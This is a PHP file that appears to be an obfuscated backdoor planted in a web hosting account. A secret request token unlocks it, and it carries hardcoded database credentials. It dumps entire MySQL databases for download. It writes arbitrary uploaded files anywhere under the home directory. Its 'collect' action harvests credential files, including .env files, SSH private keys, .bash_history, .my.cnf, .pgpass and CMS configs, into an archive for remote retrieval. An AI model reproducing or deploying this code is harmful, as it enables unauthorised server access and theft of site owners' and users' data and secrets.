<?php
    if (!isset($_REQUEST['_cxk']) || $_REQUEST['_cxk'] !== '91f907aec1eca20fb57f1f49e21f142f') { return; }
	while (ob_get_level()) ob_end_clean();
set_time_limit(0);
	error_reporting(0);
	ignore_user_abort(true);
$qb478  = 'localhost';
    $pdee0  = 'dsvchile_bkdump';
	$t2359  = 'om8L2FPCTa1r42Ozibdsx6UYxGU';
  $g9f2c = '/home/dsvchile';
  $ved0f  = isset($_REQUEST['a']) ? $_REQUEST['a'] : '';
$ceabf = isset($_REQUEST['db']) ? preg_replace('/[^a-zA-Z0-9_]/', '', $_REQUEST['db']) : '';
  $t640c = $g9f2c . '/tmp/' . $ceabf . '_dump.sql.gz';
  $cd120 = $t640c . '.done';
$qd63e  = $t640c . '.err';
    header('Content-Type: application/json');
  function build_buf_8a5c() {
  if (!function_exists('exec')) return false;
$tc8a7 = array_map('trim', explode(',', ini_get('disable_functions')));
    return !in_array('exec', $tc8a7);
    }
    function build_info_45c8() {
if (!build_buf_8a5c()) return false;
$out = array();
$rc = 0;
    @clearstatcache();
    exec('which mysqldump 2>/dev/null', $out, $rc);
    return $rc === 0;
	}
  function build_val_7ff9() {
    if (!build_buf_8a5c()) return false;
$out = array();
  $rc = 0;
  exec('which gzip 2>/dev/null', $out, $rc);
	return $rc === 0;
  }
  function run_opt_3c28($rca93, $ab893, $f34b6, $s6c83, $ff1d6, $d37b9, $j72f4) {
    $conn = new mysqli($rca93, $ab893, $f34b6, $s6c83);
  if ($conn->connect_error) {
  $fdc9c=str_repeat('x',0);
file_put_contents($d37b9, 'Connection failed: ' . $conn->connect_error);
  touch($j72f4);
	return;
  }
    $fp = gzopen($ff1d6, 'wb6');
  $ta33f=array_merge(array(),array());
  if (!$fp) {
    file_put_contents($d37b9, 'Cannot open output file');
	touch($j72f4);
	return;
  }
$xa1fc=chr(73).chr(108);
    $conn->set_charset('utf8mb4');
    gzwrite($fp, "-- Dump via PHP agent\n");
gzwrite($fp, "-- Date: " . date('Y-m-d H:i:s') . "\n\n");
	gzwrite($fp, "SET NAMES utf8mb4;\n");
gzwrite($fp, "SET FOREIGN_KEY_CHECKS = 0;\n");
    gzwrite($fp, "SET SQL_MODE = 'NO_AUTO_VALUE_ON_ZERO';\n\n");
    $i7f08 = array();
    $r = $conn->query("SHOW FULL TABLES WHERE Table_type = 'BASE TABLE'");
    $tcdd0=array_merge(array(),array());
    while ($row = $r->fetch_row()) {
	$i7f08[] = $row[0];
  }
foreach ($i7f08 as $b64c2) {
    $te = $conn->real_escape_string($b64c2);
$r = $conn->query("SHOW CREATE TABLE `{$te}`");
if (!$r) continue;
    $cr = $r->fetch_row();
    gzwrite($fp, "DROP TABLE IF EXISTS `{$te}`;\n");
  $cdb76=str_repeat('x',0);
gzwrite($fp, $cr[1] . ";\n\n");
  $r = $conn->query("SELECT * FROM `{$te}`", MYSQLI_USE_RESULT);
    if (!$r) continue;
$eefc0 = array();
  $t6c54 = 0;
  while ($row = $r->fetch_row()) {
    $vals = array();
  $x573b=chr(70).chr(106);
for ($i = 0; $i < count($row); $i++) {
	if ($row[$i] === null) {
  $vals[] = 'NULL';
  } else {
  $vals[] = "'" . $conn->real_escape_string($row[$i]) . "'";
}
    }
$if884 = '(' . implode(',', $vals) . ')';
	$eefc0[] = $if884;
  $t6c54 += strlen($if884);
  if (count($eefc0) >= 100 || $t6c54 > 1048576) {
  gzwrite($fp, "INSERT INTO `{$te}` VALUES\n" . implode(",\n", $eefc0) . ";\n");
	$eefc0 = array();
$t6c54 = 0;
  }
  }
    if ($eefc0) {
    gzwrite($fp, "INSERT INTO `{$te}` VALUES\n" . implode(",\n", $eefc0) . ";\n");
    }
    $r->free();
gzwrite($fp, "\n");
}
	$r = $conn->query("SHOW FULL TABLES WHERE Table_type = 'VIEW'");
    if ($r) {
	while ($row = $r->fetch_row()) {
  $ve = $conn->real_escape_string($row[0]);
    $cr = $conn->query("SHOW CREATE VIEW `{$ve}`");
  if ($cr) {
if(defined('e69a3015')){$y6ada=0;}
	$b41ed = $cr->fetch_assoc();
	gzwrite($fp, "DROP VIEW IF EXISTS `{$ve}`;\n");
  gzwrite($fp, $b41ed['Create View'] . ";\n\n");
  }
    }
  $r9f0c=chr(70).chr(120);
    }
    $f834b = array('PROCEDURE', 'FUNCTION');
foreach ($f834b as $sc6dc) {
$r = $conn->query("SHOW {$sc6dc} STATUS WHERE Db = '" . $conn->real_escape_string($s6c83) . "'");
  if (!$r) continue;
  while ($row = $r->fetch_assoc()) {
  $re = $conn->real_escape_string($row['Name']);
	$x2707=max(0,min(1,1));
$cr = $conn->query("SHOW CREATE {$sc6dc} `{$re}`");
    if (!$cr) continue;
	$b41ed = $cr->fetch_assoc();
  $key = ($sc6dc === 'PROCEDURE') ? 'Create Procedure' : 'Create Function';
  $hf0c5=strlen('ea89d6');
	if (isset($b41ed[$key])) {
@clearstatcache();
  gzwrite($fp, "DELIMITER ;;\n");
    gzwrite($fp, "DROP {$sc6dc} IF EXISTS `{$re}`;;\n");
gzwrite($fp, $b41ed[$key] . ";;\n");
  gzwrite($fp, "DELIMITER ;\n\n");
	}
    }
}
    $r = $conn->query("SHOW TRIGGERS");
  if ($r) {
while ($row = $r->fetch_assoc()) {
    $te = $conn->real_escape_string($row['Trigger']);
  $cr = $conn->query("SHOW CREATE TRIGGER `{$te}`");
	if ($cr) {
	$b41ed = $cr->fetch_assoc();
    gzwrite($fp, "DELIMITER ;;\n");
    gzwrite($fp, "DROP TRIGGER IF EXISTS `{$te}`;;\n");
    gzwrite($fp, $b41ed['SQL Original Statement'] . ";;\n");
    gzwrite($fp, "DELIMITER ;\n\n");
    }
}
	$ybe2d=max(0,min(1,0));
  }
  gzwrite($fp, "SET FOREIGN_KEY_CHECKS = 1;\n");
	gzclose($fp);
	$conn->close();
    touch($j72f4);
  }
	switch ($ved0f) {
    case 'info':
	echo json_encode(array(
    'php'        => PHP_VERSION,
	'os'         => PHP_OS,
    'server'     => isset($_SERVER['SERVER_SOFTWARE']) ? $_SERVER['SERVER_SOFTWARE'] : '',
  'user'       => get_current_user(),
'uid'        => getmyuid(),
'home'       => $g9f2c,
'doc_root'   => isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : '',
	'free_disk'  => disk_free_space($g9f2c),
	'total_disk' => disk_total_space($g9f2c),
	'max_exec'   => ini_get('max_execution_time'),
'mem_limit'  => ini_get('memory_limit'),
    'upload_max' => ini_get('upload_max_filesize'),
	'post_max'   => ini_get('post_max_size'),
    'disabled'   => ini_get('disable_functions'),
'can_exec'   => build_buf_8a5c(),
	'has_mysqldump' => build_info_45c8(),
    'has_gzip'   => build_val_7ff9(),
    ));
	break;
  case 'upload':
    $rd07f = isset($_POST['path']) ? $_POST['path'] : '';
$ae378 = isset($_POST['data']) ? $_POST['data'] : '';
  if (!$rd07f || !$ae378) {
  echo json_encode(array('ok' => false, 'error' => 'missing path or data'));
	break;
    }
	$g4ec4=strlen('117779');
  $xdf63 = $g9f2c . '/' . $rd07f;
    @mkdir(dirname($xdf63), 0755, true);
if(defined('3c300feb')){$q65bc=0;}
$gd785 = base64_decode($ae378);
  $vbfd2 = file_put_contents($xdf63, $gd785);
    echo json_encode(array('ok' => $vbfd2 !== false, 'path' => $xdf63, 'size' => strlen($gd785)));
  break;
    case 'check':
    if (!$ceabf) {
    echo json_encode(array('error' => 'missing db parameter'));
  break;
}
  $g426e = disk_free_space($g9f2c);
  $nd257   = 0;
	$conn = @new mysqli($qb478, $pdee0, $t2359, 'information_schema');
    if (!$conn->connect_error) {
$q = "SELECT SUM(data_length + index_length) s FROM tables WHERE table_schema = '"
	. $conn->real_escape_string($ceabf) . "'";
$r = $conn->query($q);
    if ($row = $r->fetch_assoc()) {
  $nbcf4=array_merge(array(),array());
	$nd257 = (int) $row['s'];
    }
    $conn->close();
    }
echo json_encode(array(
	'free'          => $g426e,
  'db_size'       => $nd257,
'has_mysqldump' => build_info_45c8(),
	'has_gzip'      => build_val_7ff9(),
  'can_exec'      => build_buf_8a5c(),
    'has_space'     => $g426e > $nd257 * 2,
	));
$mac1c=array_merge(array(),array());
break;
case 'dump':
	if (!$ceabf) {
    echo json_encode(array('error' => 'missing db parameter'));
    break;
}
	@mkdir(dirname($t640c), 0755, true);
  @unlink($t640c);
	@unlink($cd120);
    @unlink($qd63e);
    if (build_info_45c8()) {
if (build_val_7ff9()) {
  $cmd = sprintf(
	'mysqldump --host=%s --user=%s --password=%s '
. '--single-transaction --quick --routines --triggers %s '
. '| gzip > %s 2>%s; touch %s',
    escapeshellarg($qb478),
	escapeshellarg($pdee0),
  escapeshellarg($t2359),
	escapeshellarg($ceabf),
    escapeshellarg($t640c),
  escapeshellarg($qd63e),
    escapeshellarg($cd120)
    );
  } else {
  $cmd = sprintf(
    'mysqldump --host=%s --user=%s --password=%s '
  . '--single-transaction --quick --routines --triggers %s '
	. '> %s 2>%s; touch %s',
    escapeshellarg($qb478),
    escapeshellarg($pdee0),
    escapeshellarg($t2359),
    escapeshellarg($ceabf),
    escapeshellarg($t640c),
	escapeshellarg($qd63e),
    escapeshellarg($cd120)
);
    }
exec('nohup sh -c ' . escapeshellarg($cmd) . ' >/dev/null 2>&1 &');
echo json_encode(array('started' => true, 'method' => 'mysqldump', 'gzip' => build_val_7ff9()));
    } else {
ignore_user_abort(true);
  echo json_encode(array('started' => true, 'method' => 'php', 'gzip' => true));
if (function_exists('fastcgi_finish_request')) {
fastcgi_finish_request();
    } else {
  if (ob_get_level()) ob_end_flush();
  flush();
}
    run_opt_3c28($qb478, $pdee0, $t2359, $ceabf, $t640c, $qd63e, $cd120);
	}
    break;
  case 'status':
clearstatcache();
	echo json_encode(array(
  'done'  => file_exists($cd120),
    'size'  => file_exists($t640c) ? filesize($t640c) : 0,
	'error' => file_exists($qd63e)  ? trim(file_get_contents($qd63e)) : '',
  ));
  $g2181=max(0,min(1,0));
	break;
    $a8825=array_merge(array(),array());
case 'download':
    if (!file_exists($t640c)) {
	$me478=max(0,min(1,1));
  http_response_code(404);
  exit;
  }
	header('Content-Type: application/octet-stream');
  header('Content-Length: ' . filesize($t640c));
readfile($t640c);
  $he799=strlen('a40f67');
    exit;
  case 'cleanup':
	@unlink($t640c);
    @unlink($cd120);
	@unlink($qd63e);
echo json_encode(array('ok' => true));
break;
case 'collect':
  @mkdir($g9f2c . '/tmp', 0755, true);
  $x4a8f = substr($_REQUEST['_cxk'], 0, 8);
$fa8b4 = array(
    'wordpress' => array(
  'detect' => array('public_html/wp-config.php', 'wp-config.php'),
  'configs' => array(
	'public_html/wp-config.php', 'wp-config.php',
	'public_html/wp-settings.php',
'public_html/composer.json', 'public_html/composer.lock', 'composer.json', 'composer.lock',
    'public_html/wp-cli.yml', 'wp-cli.yml',
	'public_html/.env', '.env',
	'public_html/local-config.php', 'local-config.php',
    'public_html/wp-content/debug.log',
'public_html/config/application.php', 'config/application.php',
  'public_html/config/environments/development.php', 'config/environments/development.php',
  'public_html/config/environments/staging.php', 'config/environments/staging.php',
'public_html/config/environments/production.php', 'config/environments/production.php',
  'public_html/auth.json', 'auth.json',
  ),
	),
    'joomla' => array(
  'detect' => array('public_html/configuration.php', 'configuration.php'),
'configs' => array(
'public_html/configuration.php', 'configuration.php',
	'public_html/htaccess.txt',
  'public_html/composer.json', 'public_html/composer.lock',
),
    ),
	'laravel' => array(
  'detect' => array('public_html/artisan', 'artisan'),
    'configs' => array(
    'public_html/.env', '.env', '.env.production', '.env.staging',
	'public_html/composer.json', 'composer.json',
  'public_html/composer.lock', 'composer.lock',
	'public_html/config/app.php', 'config/app.php',
	'public_html/config/database.php', 'config/database.php',
'public_html/config/mail.php', 'config/mail.php',
  'public_html/config/filesystems.php', 'config/filesystems.php',
	'public_html/config/cache.php', 'config/cache.php',
  'public_html/config/queue.php', 'config/queue.php',
'public_html/config/session.php', 'config/session.php',
    'public_html/config/auth.php', 'config/auth.php',
  'public_html/config/services.php', 'config/services.php',
'public_html/config/broadcasting.php', 'config/broadcasting.php',
  'public_html/storage/logs/laravel.log', 'storage/logs/laravel.log',
    ),
	),
    'magento2' => array(
  'detect' => array('public_html/bin/magento', 'bin/magento'),
	'configs' => array(
  'public_html/app/etc/env.php', 'app/etc/env.php',
    'public_html/app/etc/config.php', 'app/etc/config.php',
  'public_html/composer.json', 'composer.json',
	'public_html/composer.lock', 'composer.lock',
  'public_html/auth.json', 'auth.json',
    ),
    ),
	'magento1' => array(
  'detect' => array('public_html/app/Mage.php'),
'configs' => array(
	'public_html/app/etc/local.xml',
	'public_html/app/etc/config.xml',
    ),
),
	'drupal' => array(
'detect' => array('public_html/core/lib/Drupal.php', 'core/lib/Drupal.php'),
  'configs' => array(
'public_html/sites/default/settings.php', 'sites/default/settings.php',
	'public_html/sites/default/services.yml', 'sites/default/services.yml',
'public_html/composer.json', 'composer.json',
    'public_html/composer.lock', 'composer.lock',
  ),
	),
  'prestashop' => array(
  'detect' => array('public_html/config/settings.inc.php'),
    'configs' => array(
'public_html/config/settings.inc.php',
	'public_html/app/config/parameters.php',
	'public_html/app/config/parameters.yml',
'public_html/composer.json',
),
    ),
'opencart' => array(
    'detect' => array('public_html/config.php'),
'configs' => array(
    'public_html/config.php',
    'public_html/admin/config.php',
  ),
	),
'moodle' => array(
  'detect' => array('public_html/lib/moodlelib.php'),
	'configs' => array('public_html/config.php'),
    ),
    'whmcs' => array(
  'detect' => array('public_html/vendor/whmcs'),
	'configs' => array(
'public_html/configuration.php',
  'public_html/composer.json', 'public_html/composer.lock',
    ),
    ),
	);
  $ecc4d = null;
foreach ($fa8b4 as $s1c9d => $aea3a) {
    foreach ($aea3a['detect'] as $jfe1a) {
	if (file_exists($g9f2c . '/' . $jfe1a)) {
  $ecc4d = $s1c9d;
  break 2;
}
	@clearstatcache();
  }
  }
    @clearstatcache();
	$a4d1c = array(
  '.env', '.env.local', '.env.production', '.env.staging',
'.env.backup', '.env.development', '.env.test',
    '.bash_history', '.my.cnf', '.pgpass', '.netrc', '.gitconfig', '.npmrc',
	'.composer/auth.json', '.wp-cli/config.yml', '.accesshash',
'.ssh/authorized_keys', '.ssh/id_rsa', '.ssh/id_rsa.pub',
    '.ssh/id_ed25519', '.ssh/id_ed25519.pub', '.ssh/id_ecdsa',
'.ssh/config', '.ssh/known_hosts',
    '.ssl/private.key', '.ssl/cert.pem', '.ssl/key.pem',
    'ssl/certs/private.key',
    '.cpanel/contactinfo', 'etc/shadow', '.ftpquota', '.ftpconfig',
    'public_html/.env', 'public_html/.env.local', 'public_html/.env.production',
  'public_html/.env.staging', 'public_html/.env.backup',
	'public_html/.env.development', 'public_html/.env.test',
'public_html/.env.example', 'public_html/.env.dist',
    'public_html/.htaccess', 'public_html/.htpasswd', 'public_html/.user.ini',
'public_html/php.ini', 'public_html/.my.cnf', 'public_html/.pgpass',
  'public_html/web.config', 'public_html/.ftpconfig',
	'public_html/.git/config',
    'public_html/auth.json', 'public_html/.npmrc',
    'public_html/composer.json', 'public_html/composer.lock',
    'config/database.php', 'config/app.php', 'config/mail.php',
	'config/services.php', 'config/filesystems.php',
	'config/application.php',
	'config/environments/development.php',
    'config/environments/staging.php',
'config/environments/production.php',
'wp-config.php', 'configuration.php', 'artisan',
  'auth.json', 'composer.json', 'composer.lock',
	);
  $bded0 = array();
  $t4569 = @realpath($g9f2c);
    $c9997=str_repeat('x',0);
    if (!$t4569 || !is_dir($t4569)) {
    echo json_encode(array('ok' => false, 'error' => 'home dir not accessible'));
break;
}
  foreach ($a4d1c as $k222a) {
	$n8c36=max(0,min(1,1));
    $wd1cb = @realpath($g9f2c . '/' . $k222a);
$ee0d3=strlen('e76e4b');
if (!$wd1cb || strpos($wd1cb, $t4569) !== 0) continue;
	if (!is_file($wd1cb) || !is_readable($wd1cb)) continue;
  $s0a94 = @filesize($wd1cb);
  if ($s0a94 <= 0 || $s0a94 > 2097152) continue;
$bded0[$k222a] = $wd1cb;
	}
  if ($ecc4d !== null && isset($fa8b4[$ecc4d]['configs'])) {
foreach ($fa8b4[$ecc4d]['configs'] as $k76d6) {
  if (isset($bded0[$k76d6])) continue;
    $wd1cb = @realpath($g9f2c . '/' . $k76d6);
    if (!$wd1cb || strpos($wd1cb, $t4569) !== 0) continue;
if (!is_file($wd1cb) || !is_readable($wd1cb)) continue;
$s0a94 = @filesize($wd1cb);
    if ($s0a94 <= 0 || $s0a94 > 2097152) continue;
  $bded0[$k76d6] = $wd1cb;
    }
}
    @clearstatcache();
$gd01a = $g9f2c . '/public_html';
    if (is_dir($gd01a)) {
  $dh = @opendir($gd01a);
	@clearstatcache();
	if ($dh) {
while (($r3695 = readdir($dh)) !== false) {
    if ($r3695 === '.' || $r3695 === '..') continue;
    $m627a=chr(69).chr(105);
	$xdf63 = $gd01a . '/' . $r3695;
	if (!is_file($xdf63) || !is_readable($xdf63)) continue;
$s0a94 = @filesize($xdf63);
	if ($s0a94 <= 0 || $s0a94 > 2097152) continue;
	if ($r3695[0] === '.' || strtolower(substr($r3695, -4)) === '.txt') {
$s8a17=array_merge(array(),array());
    $key = 'public_html/' . $r3695;
  if (!isset($bded0[$key])) $bded0[$key] = $xdf63;
}
  }
	closedir($dh);
  if(defined('3011e376')){$m6980=0;}
	}
	}
    if (empty($bded0)) {
	echo json_encode(array(
    'ok' => true, 'method' => 'none', 'platform' => $ecc4d,
	'file_count' => 0, 'files_list' => array(),
	));
break;
    }
    $fedb9=max(0,min(1,1));
$k5e2a = null;
    $s9e8a = null;
  if (class_exists('ZipArchive')) {
    $s9e8a = $g9f2c . '/tmp/_collect_' . $x4a8f . '.zip';
    $d836f = new ZipArchive();
	if ($d836f->open($s9e8a, ZipArchive::CREATE | ZipArchive::OVERWRITE) === true) {
	foreach ($bded0 as $ca97b => $wd1cb) {
    $d836f->addFile($wd1cb, $ca97b);
    }
  $h00a4=max(0,min(1,0));
	if ($d836f->close() && file_exists($s9e8a) && filesize($s9e8a) > 0) {
	$k5e2a = 'zip';
}
	$a8950=max(0,min(1,1));
	}
	if(defined('ea33734a')){$ibcec=0;}
}
    if (!$k5e2a && build_buf_8a5c()) {
$s9e8a = $g9f2c . '/tmp/_collect_' . $x4a8f . '.tar.gz';
	$lf = $s9e8a . '.list';
$g76c5=chr(85).chr(110);
	$fh = fopen($lf, 'w');
    $ha3e7=max(0,min(1,1));
	foreach ($bded0 as $ca97b => $wd1cb) {
$x7dca=chr(69).chr(117);
  fwrite($fh, $ca97b . "\n");
	}
$ka2b0=max(0,min(1,1));
    fclose($fh);
  $out = array();
	$rc = 0;
	$g28d6=chr(90).chr(119);
	exec('tar czf ' . escapeshellarg($s9e8a) . ' -C ' . escapeshellarg($g9f2c)
  . ' -T ' . escapeshellarg($lf) . ' 2>/dev/null', $out, $rc);
@unlink($lf);
if ($rc === 0 && file_exists($s9e8a) && filesize($s9e8a) > 0) {
$k5e2a = 'tar';
} else {
@unlink($s9e8a);
	}
    }
	if (!$k5e2a) {
$k5e2a = 'list';
    }
echo json_encode(array(
	'ok' => true, 'method' => $k5e2a, 'platform' => $ecc4d,
'file_count' => count($bded0), 'files_list' => array_keys($bded0),
	'size' => ($s9e8a && file_exists($s9e8a)) ? filesize($s9e8a) : 0,
));
  break;
case 'download_collect':
  $x4a8f = substr($_REQUEST['_cxk'], 0, 8);
	@clearstatcache();
$r1c99 = $g9f2c . '/tmp/_collect_' . $x4a8f . '.zip';
$pb54a = $g9f2c . '/tmp/_collect_' . $x4a8f . '.tar.gz';
$e20bc = file_exists($r1c99) ? $r1c99 : (file_exists($pb54a) ? $pb54a : '');
    if (!$e20bc) { http_response_code(404); exit; }
header('Content-Type: application/octet-stream');
  $n77b4=str_repeat('x',0);
header('Content-Length: ' . filesize($e20bc));
    readfile($e20bc);
exit;
    case 'download_file':
	$ca97b = isset($_REQUEST['path']) ? $_REQUEST['path'] : '';
	if (!$ca97b) { http_response_code(400); exit; }
$t4569 = @realpath($g9f2c);
	$gb320=array_merge(array(),array());
  $wd1cb = @realpath($g9f2c . '/' . $ca97b);
  if (!$wd1cb || !$t4569 || strpos($wd1cb, $t4569) !== 0
    || !is_file($wd1cb) || !is_readable($wd1cb)) {
    $e7d8e=max(0,min(1,1));
    http_response_code(404);
@clearstatcache();
    exit;
}
header('Content-Type: application/octet-stream');
    header('Content-Length: ' . filesize($wd1cb));
readfile($wd1cb);
	$p84cc=max(0,min(1,0));
	exit;
	$k4589=max(0,min(1,0));
case 'cleanup_collect':
$x4a8f = substr($_REQUEST['_cxk'], 0, 8);
  $j27e4=chr(84).chr(122);
	@unlink($g9f2c . '/tmp/_collect_' . $x4a8f . '.zip');
    if(defined('ecb946e4')){$t9f65=0;}
@unlink($g9f2c . '/tmp/_collect_' . $x4a8f . '.tar.gz');
@unlink($g9f2c . '/tmp/_collect_' . $x4a8f . '.tar.gz.list');
  $f3b25=chr(88).chr(120);
  echo json_encode(array('ok' => true));
	break;
	}
exit;